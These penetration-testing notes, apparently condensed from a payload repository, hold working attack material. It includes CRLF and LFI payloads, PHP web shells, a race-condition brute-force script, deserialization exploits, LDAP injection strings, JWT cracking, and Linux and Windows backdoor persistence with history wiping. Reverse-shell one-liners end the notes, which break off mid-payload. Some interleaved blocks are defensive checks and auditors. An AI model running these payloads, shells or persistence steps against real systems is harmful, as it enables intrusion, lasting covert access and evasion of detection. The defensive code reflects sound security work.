Penetration Testing Notes

I recently came across a very good repository and, having some spare time, went through all of it and took these notes.

1. CRLF

CRLF - adding a cookie

http://www.example.com/%0D%0ASet-Cookie:mycookie=myvalue

CRLF - XSS protection bypass

http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e

CRLF - phishing

http://www.example.com/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E

CRLF - Filter Bypass

Using UTF-8 encoding:
%E5%98%8A => %0A => \u560a
%E5%98%8D => %0D => \u560d
%E5%98%BE => %3E => \u563e (>)
%E5%98%BC => %3C => \u563c (<)
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
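A server-side check for the two CRLF variants above, added here as an example (it is not code from the notes or from the repository they summarise). It percent-decodes a parameter the way a web framework would and refuses it if it contains CR, LF or NUL, or a wide code point such as U+560A/U+560D whose low byte is a line break; the sample values are constructed from the payloads above.

```python
from typing import Optional
from urllib.parse import unquote

# Constructed samples: a benign value, the %0D%0A cookie injection from the notes, and the
# UTF-8 variant whose code points U+560A/U+560D end in the bytes 0x0A/0x0D.
SAMPLES = {
    "benign": "en",
    "crlf": "en%0D%0ASet-Cookie:mycookie=myvalue",
    "utf8": "%E5%98%8A%E5%98%8Dcontent-type:text/html",
}

def header_injection_risk(raw_param: str) -> Optional[str]:
    """Explain why raw_param could start a new header line, or return None if it cannot."""
    decoded = unquote(raw_param)  # %XX -> bytes -> UTF-8 text, so %E5%98%8A becomes U+560A
    for ch in decoded:
        cp = ord(ch)
        if cp in (0x0A, 0x0D, 0x00):
            return f"control character 0x{cp:02X} after percent-decoding"
        # Wide code points whose low byte is CR/LF reproduce the U+560A/U+560D trick on
        # stacks that truncate a character to 8 bits before writing the header.
        if cp > 0xFF and (cp & 0xFF) in (0x0A, 0x0D):
            return f"U+{cp:04X} truncates to a line break"
    return None

def safe_header_value(raw_param: str) -> str:
    """Use for Location/Set-Cookie: refuse the whole value instead of stripping bytes."""
    risk = header_injection_risk(raw_param)
    if risk:
        raise ValueError(f"refusing header value: {risk}")
    return unquote(raw_param)

def triage(samples=None) -> dict:
    """Run the check over the constructed samples; usable as a unit test or a log audit."""
    samples = SAMPLES if samples is None else samples
    return {name: header_injection_risk(value) for name, value in samples.items()}
```

Refusing the request is preferable to stripping the offending bytes: a sanitiser that only removes `\r\n` still lets the UTF-8 form through, which is exactly what the last payload above exploits.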

2. CSV / Excel formula injection

Any cell that begins with one of the characters '=', '+', '-' or '@' is interpreted as a formula by spreadsheet software.
Dynamic Data Exchange (DDE):
=DDE(server; file; item; mode)
Exploit:
=DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
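The standard mitigation on the export side, added here as an example rather than taken from the notes: any cell that starts with one of the trigger characters (including a leading tab or carriage return, which Excel also treats as a formula start) is prefixed with a single quote so the spreadsheet stores it as text. The sample rows are constructed from the two DDE payloads above.

```python
import csv
import io

FORMULA_LEADERS = ("=", "+", "-", "@")

def neutralize_cell(value) -> str:
    """Prefix anything a spreadsheet would parse as a formula with a single quote."""
    s = str(value)
    # A leading tab or CR also starts a formula in Excel, and leading spaces are
    # ignored, so test the stripped text as well as the raw start of the cell.
    if s.startswith(("\t", "\r")) or s.lstrip().startswith(FORMULA_LEADERS):
        return "'" + s
    return s

def write_safe_csv(rows) -> str:
    """Serialise rows with every cell neutralised and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()

# Constructed export: a header, one benign row and the two DDE payloads from the notes.
SAMPLE_ROWS = [
    ["user", "comment"],
    ["alice", "thanks"],
    ["mallory", '=DDE ("cmd";"/C calc";"!A0")A0'],
    ["mallory", "@SUM(1+1)*cmd|' /C calc'!A0"],
]
```

The quote also lands on legitimate negative numbers such as `-5`; exports that need numeric cells should emit typed values through a spreadsheet library instead of CSV text.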

3. File inclusion

Linux

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/PID/fd/<file descriptor>
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp

Windows

c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/system volume information/wpsettings.dat
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml

Log files

/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail

Basic syntax

http://example.com/index.php?page=../../../etc/passwd

Null-byte (%00) truncation

http://example.com/index.php?page=../../../etc/passwd%00

Double encoding

http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

Directory traversal

http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[...]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
Bypass Filter:
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
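How a `?page=` parameter can be resolved so that none of the traversal, null-byte, double-encoding or backslash variants above escape the page directory, added here as an example (not code from the notes or the repository). It decodes until the value is stable, rejects NUL bytes, stream-wrapper prefixes and backslashes, and then uses `realpath` plus a common-prefix check rather than trying to strip `../` patterns. `BASE_DIR` is an assumed, constructed location.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

BASE_DIR = "/srv/app/pages"   # constructed: the only directory pages may be loaded from
# php://, zip://, data:, expect://, phar:// ... a scheme is never a legitimate page name
WRAPPER = re.compile(r"^[a-z][a-z0-9+.-]*:", re.IGNORECASE)

def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so %252e%252e%252f is seen as ../"""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def resolve_include(page: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Map ?page=... to an absolute path inside base_dir, or None if it must be refused."""
    decoded = fully_decode(page)
    if "\x00" in decoded:             # %00 truncation
        return None
    if WRAPPER.match(decoded):        # stream wrappers
        return None
    if "\\" in decoded:               # %5C / backslash variants
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, decoded.lstrip("/")))
    # realpath collapses ../, ./, //// and symlinks; anything that leaves base is rejected
    if target == base or os.path.commonpath([base, target]) != base:
        return None
    return target
```

The `....//` and `..///` forms are handled without special cases because the check is on the resolved path, not on the string. An allow-list of page names is stricter still and is the better design when the set of pages is known.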

Protocol wrappers

php://filter
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode|convert.base64-encode|convert.base64-encode/resource=index.php
Chaining for large files:
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
zip://
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
http://example.com/index.php?page=zip://shell.jpg%23payload.php
data://
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
base64 content: "<?php system($_GET['cmd']);?>"
Bypassing XSS protection:
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
base64 content: <svg onload=alert(1)>
expect://
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
input://
http://example.com/index.php?page=php://input
POST:
<?php system('id'); ?>
phar://
// Step 1 (create.phar.php): build a Phar archive whose metadata is a serialized object
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
// add metadata: this object is unserialized whenever the archive is opened
class AnyClass {}
$object = new AnyClass;
$object->data = 'phar';
$phar->setMetadata($object);
$phar->stopBuffering();

// Step 2 (vuln.php, a separate script - PHP cannot redeclare AnyClass in the same file): trigger
class AnyClass {
    function __destruct() {
        echo $this->data;
    }
}
// output: phar
include('phar://test.phar');

Remote command execution

/proc/*/fd
1. Upload a number of shell files (100+)
2. Include: http://example.com/index.php?page=/proc/$PID/fd/$FD
$PID: process id (can be brute-forced)
$FD: file descriptor (can be brute-forced)
/proc/self/environ
As with log files, a payload sent in the User-Agent is recorded in /proc/self/environ
GET index.php?page=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
File upload
Upload a file of any format containing malicious code, e.g.: <?php system($_GET['c']);?>
http://example.com/index.php?page=path/to/upload/file.png
Race condition
1. Upload a file and trigger self-inclusion
2. Upload repeatedly to raise the odds of winning the race and of the brute force succeeding
3. Brute-force the included file name: /tmp/[0-9a-zA-Z]{6}
# bruteforce_upload_race.py
import itertools
import string
import sys
import requests

print('[+] Upload Trying...')
for _ in range(4096 * 4096):
    # re-open for every request so the file body is actually sent each time
    with open('shell.php', 'rb') as fh:
        requests.post('http://target.com/index.php?c=index.php', files={'file': fh})
print('[+] Bruteforcing...')
# itertools.product (with repetition) enumerates every 6-character name; combinations would not
for chars in itertools.product(string.ascii_letters + string.digits, repeat=6):
    fname = ''.join(chars)
    url = 'http://target.com/index.php?c=/tmp/php' + fname
    r = requests.get(url)
    if 'load average' in r.text:  # shell.php contains <?php echo system('uptime');
        print('[+] We have got a shell: ' + url)
        sys.exit(0)
print('[x] Something went wrong, please try again')
phpinfo

https://www.insomniasec.com/downloads/publications/phpinfolfi.py

4. Insecure deserialization

Java

Exploit:https://github.com/frohoff/ysoserial
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
Burp Suite extensions:
JavaSerialKiller
Java Deserialization Scanner
Burp-ysoserial
SuperSerial
SuperSerial-Active

PHP

<?php
system('gnome-terminal -x sh -c \'nc -lvvp 2333\'');
class PHPObjectInjection
{
public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}
$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r=';
$url = $url . urlencode(serialize(new PHPObjectInjection));
print "[+] Sending exploit...\r\n";
$response = file_get_contents("$url");
?>

Python

import os
try:
    import cPickle as pickle   # Python 2
except ImportError:
    import pickle              # Python 3
from base64 import b64encode, b64decode

class Evil(object):
    # __reduce__ tells the unpickler which callable to invoke, with which arguments
    def __reduce__(self):
        return (os.system, ("whoami",))

e = Evil()
evil_token = b64encode(pickle.dumps(e))
print("Your Evil Token : {}".format(evil_token))

Ruby

for i in {0..5}; do
  docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'
done
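The Python `__reduce__` mechanism shown above works because the default unpickler imports and calls whatever global the stream names. The defensive counterpart, added here as an example (not code from the notes or the repository), is an `Unpickler` whose `find_class` only resolves an explicit allow-list; everything else raises before any callable is reached. The `Demo` class is constructed for this example and points at the harmless `os.getpid` so that the rejection can be shown without running a command.

```python
import io
import os
import pickle

# Constructed demo: a class whose __reduce__ asks the unpickler to call os.getpid().
# Real payloads (see the cPickle snippet above) name os.system; the mechanism is identical.
class Demo:
    def __reduce__(self):
        return (os.getpid, ())

# Only these globals may be materialised from a pickle stream.
ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def safe_loads(data: bytes):
    """pickle.loads with the allow-list above enforced for GLOBAL/STACK_GLOBAL opcodes."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

def demo_blocked() -> bool:
    """True if the reduce-based payload is refused before os.getpid is ever resolved."""
    payload = pickle.dumps(Demo())
    try:
        safe_loads(payload)
    except pickle.UnpicklingError:
        return True
    return False

def demo_allowed():
    """Plain containers and strings contain no globals and still load."""
    return safe_loads(pickle.dumps({"user": "alice", "roles": ["admin"]}))
```

Even with the allow-list, unpickling untrusted input remains a parser attack surface; where the data format is under your control, JSON or another data-only format removes the problem entirely.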

5. JWT (JSON Web Token)

Format: Base64(Header).Base64(Data).Base64(Signature)
Example:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFtYXppbmcgSGF4eDByIiwiZXhwIjoiMTQ2NjI3MDcyMiIsImFkbWluIjp0cnVlfQ.UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY
JWT online encoder/decoder: https://www.jsonwebtoken.io/
JWT tools:
jwt_tool
git clone https://github.com/ticarpi/jwt_tool
> python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw result.txt
c-jwt-cracker
git clone https://github.com/brendan-rius/c-jwt-cracker
>./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE
> Secret is "Sn1f"
Hashcat
hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret

6. LDAP injection

Example 1:
user = *)(uid=*))(|(uid=*
pass = password
query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword=MD5(password}))"
Example 2:
user = admin)(!(&(1=0
pass = q))
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
Attack payloads:
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
Default attributes:
// *)(ATTRIBUTE_HERE=*
userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName
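Both examples above work because the user-supplied value is pasted into the filter unescaped. The fix is RFC 4515 escaping of every value that goes inside a filter, shown here as an added example (not code from the notes or the repository): `\`, `*`, `(`, `)` and NUL become `\5c`, `\2a`, `\28`, `\29`, `\00`, so the injected parentheses are matched as literal characters instead of restructuring the filter. The unsafe builder is included only to show the contrast.

```python
LDAP_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}

def escape_filter_value(value: str) -> str:
    """RFC 4515 escaping for a value used inside an LDAP search filter."""
    return "".join(LDAP_ESCAPES.get(ch, ch) for ch in value)

def build_login_filter_unsafe(username: str, password_hash: str) -> str:
    """String concatenation: this is the pattern the two examples above break out of."""
    return f"(&(uid={username})(userPassword={password_hash}))"

def build_login_filter(username: str, password_hash: str) -> str:
    """Same filter with both values escaped; the structure can no longer be altered."""
    return f"(&(uid={escape_filter_value(username)})(userPassword={escape_filter_value(password_hash)}))"

def demo(username: str, password_hash: str) -> dict:
    """Show the unsafe and the escaped filter side by side for one input pair."""
    return {
        "unsafe": build_login_filter_unsafe(username, password_hash),
        "escaped": build_login_filter(username, password_hash),
    }
```

Escaping is the second line of defence; a bind attempt with the user's DN and password, rather than a filter that compares `userPassword`, removes the password from the filter altogether.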

7. Linux persistence

Basic reverse shell

ncat --udp -lvp 2333
ncat --tcp -lvp 2333
ncat --sctp -lvp 2333

SUID

TMPDIR="/var/tmp"
echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR/suidshell.c
gcc $TMPDIR/suidshell.c -o $TMPDIR/suidshell 2>/dev/null
chown root:root $TMPDIR/suidshell
chmod 4777 $TMPDIR/suidshell

Crontab

(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null

Startup service

RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart

Autostart file

Linux, write a file in ~/.config/autostart/NOM_OF_FILE.desktop
In : ~/.config/autostart/*.desktop
[Desktop Entry]
Type=Application
Name=Welcome
Exec=/var/lib/gnome-welcome-tour
AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
OnlyShowIn=GNOME;
X-GNOME-Autostart-enabled=false

Driver (udev rule)

echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null

Tips

1. Hide the payload with ANSI characters
2. Clear the command history
export HISTSIZE=0
export HISTFILESIZE=0
unset HISTFILE; CTRL-D
or
kill -9 $$
or
echo "" > ~/.bash_history
or
rm ~/.bash_history -rf
or
history -c
or
ln /dev/null ~/.bash_history -sf
3. The following temporary directories are usually writable
/var/tmp/
/tmp/
/dev/shm/
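A small audit of the persistence locations listed in this section, added here as an example (it is not code from the notes or the repository). It flags `@reboot` or shell-spawning crontab entries, udev `RUN+=` actions that launch a shell or netcat, `.desktop` autostart entries that execute from temp or home directories, and setuid files under the "usually writable" temp directories. All sample inputs are constructed; the SUID check builds its own throwaway directory.

```python
import os
import re
import stat
import tempfile

SHELL_HINTS = re.compile(r"\b(ncat|nc|netcat|socat)\b|/dev/tcp/|bash -i|/bin/(ba)?sh")
TMP_DIRS = ("/var/tmp", "/tmp", "/dev/shm")

def suspicious_cron_lines(crontab_text: str) -> list:
    """@reboot jobs and any job that launches a shell or netcat (cf. the crontab one-liner above)."""
    hits = []
    for line in crontab_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if s.startswith("@reboot") or SHELL_HINTS.search(s):
            hits.append(s)
    return hits

def suspicious_udev_rules(rules_text: str) -> list:
    """udev RUN+= actions that invoke a shell or network tool."""
    return [l.strip() for l in rules_text.splitlines() if "RUN+=" in l and SHELL_HINTS.search(l)]

def suspicious_autostart(desktop_text: str) -> list:
    """Exec= entries of a .desktop file that run from temp/home dirs or spawn a shell."""
    hits = []
    for line in desktop_text.splitlines():
        if line.startswith("Exec="):
            cmd = line[len("Exec="):].strip()
            if cmd.startswith(TMP_DIRS + ("/home/",)) or SHELL_HINTS.search(cmd):
                hits.append(cmd)
    return hits

def find_suid_files(dirs=TMP_DIRS) -> list:
    """Regular files with the setuid bit under the given directories."""
    found = []
    for d in dirs:
        for root, _, files in os.walk(d):
            for name in files:
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    found.append(path)
    return sorted(found)

# Constructed samples: the @reboot job from the notes next to a normal backup job, a udev
# rule carrying a netcat reverse shell next to a benign helper, and two autostart entries.
CRON_SAMPLE = ("# m h dom mon dow command\n"
               "0 3 * * * /usr/local/bin/backup.sh\n"
               "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash\n")
UDEV_SAMPLE = ('SUBSYSTEM=="usb", RUN+="/usr/lib/udev/usb-helper"\n'
               'ACTION=="add",ENV{DEVTYPE}=="usb_device",SUBSYSTEM=="usb",RUN+="ncat 192.168.1.2 4242 -e /bin/bash"\n')
AUTOSTART_SAMPLE = "[Desktop Entry]\nType=Application\nName=Welcome\nExec=/var/lib/gnome-welcome-tour\n"
AUTOSTART_EVIL = "[Desktop Entry]\nType=Application\nName=Updater\nExec=/tmp/.cache/update\n"

def demo_suid_scan() -> list:
    """Build a throwaway tree with one setuid file and return what the scanner finds."""
    with tempfile.TemporaryDirectory() as tmp:
        bad, good = os.path.join(tmp, "suidshell"), os.path.join(tmp, "notes.txt")
        for p in (bad, good):
            with open(p, "w") as fh:
                fh.write("x")
        os.chmod(bad, 0o4755)
        return [os.path.basename(p) for p in find_suid_files([tmp])]
```

Run against a real host, the text scanners take the output of `crontab -l` for each user, the files under `/etc/udev/rules.d/` and `~/.config/autostart/`; the SUID scan should be compared with a known-good baseline because a legitimate package occasionally drops setuid helpers in `/var/tmp` during an upgrade.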

8. Windows persistence

Registry

Create a REG_SZ value in the Run key under HKCU\Software\Microsoft\Windows
Name: Backdoor
Value: C:\Users\test\AppData\Local\Temp\backdoor.exe
As with HKCU, create a REG_SZ value in the Run key under HKLM\Software\Microsoft\Windows
Name: Backdoor
Value: C:\Windows\Temp\backdoor.exe

Startup folder

Create a batch script in the user's Startup folder
PS C:\> gc C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
start /b C:\Users\test\AppData\Local\Temp\backdoor.exe

Scheduled task

PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D

Service

PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."

9. Network forwarding

Windows netsh

netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
1. listenaddress – the local IP address to listen on
2. listenport – the local port to listen on
3. connectaddress – the remote IP address to redirect connections to
4. connectport – the port that connections to listenport are forwarded to
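Port proxies added with `netsh interface portproxy` survive reboots and are easy to miss in a review, so a parser for `netsh interface portproxy show all` output is a useful detection helper. The one below is an added example (not from the notes or the repository); the captured output it parses is constructed from the rule above plus a second, all-interfaces rule, and the port list it flags is an assumption to adjust per environment.

```python
import re

# Constructed capture of `netsh interface portproxy show all`; the addresses are made up.
NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.1.1.110      3340        10.1.1.110      3389
*               8080        192.168.5.6     80
"""

SENSITIVE_PORTS = {22, 445, 3389, 5985, 5986}   # assumed list of admin/lateral-movement ports
SECTION = re.compile(r"^Listen on (ipv[46]):\s+Connect to (ipv[46]):", re.I)

def parse_portproxy(text: str) -> list:
    """Turn the show-all table into a list of dicts, one per forwarding rule."""
    rules, listen_fam, connect_fam = [], None, None
    for line in text.splitlines():
        m = SECTION.match(line)
        if m:
            listen_fam, connect_fam = m.group(1).lower(), m.group(2).lower()
            continue
        cols = line.split()
        # data rows have exactly four columns and a numeric listen port; skip headers/rulers
        if len(cols) != 4 or cols[0] == "Address" or cols[0].startswith("-") or not cols[1].isdigit():
            continue
        rules.append({
            "listen_family": listen_fam, "listen_address": cols[0], "listen_port": int(cols[1]),
            "connect_family": connect_fam, "connect_address": cols[2], "connect_port": int(cols[3]),
        })
    return rules

def flag_rules(rules) -> list:
    """Rules worth an analyst's attention: exposed on all interfaces or relaying to admin ports."""
    out = []
    for r in rules:
        reasons = []
        if r["listen_address"] in ("*", "0.0.0.0", "::"):
            reasons.append("listens on all interfaces")
        if r["connect_port"] in SENSITIVE_PORTS:
            reasons.append(f"relays to admin port {r['connect_port']}")
        if reasons:
            out.append((r, reasons))
    return out
```

The same rules are stored under `HKLM\SYSTEM\CurrentControlSet\Services\PortProxy`, so a registry baseline catches them as well as the command output does.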

SSH

SOCKS proxy
ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command
Local port forwarding
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
Remote port forwarding
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]

Proxychains

1. Config file: /etc/proxychains.conf
[ProxyList]
socks4 localhost 8080
2. proxychains nmap -sT 192.168.5.6

Web SOCKS - reGeorg

https://github.com/sensepost/reGeorg
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp

Metasploit

portfwd list
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
or
run autoroute -s 192.168.57.0/24
use auxiliary/server/socks4a

10. Reverse shells

Bash TCP

bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196

Bash UDP

Victim:
sh -i >& /dev/udp/127.0.0.1/4242 0>&1
Attacker:
nc -u -lvp 4242

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

Linux
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Windows
python -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda 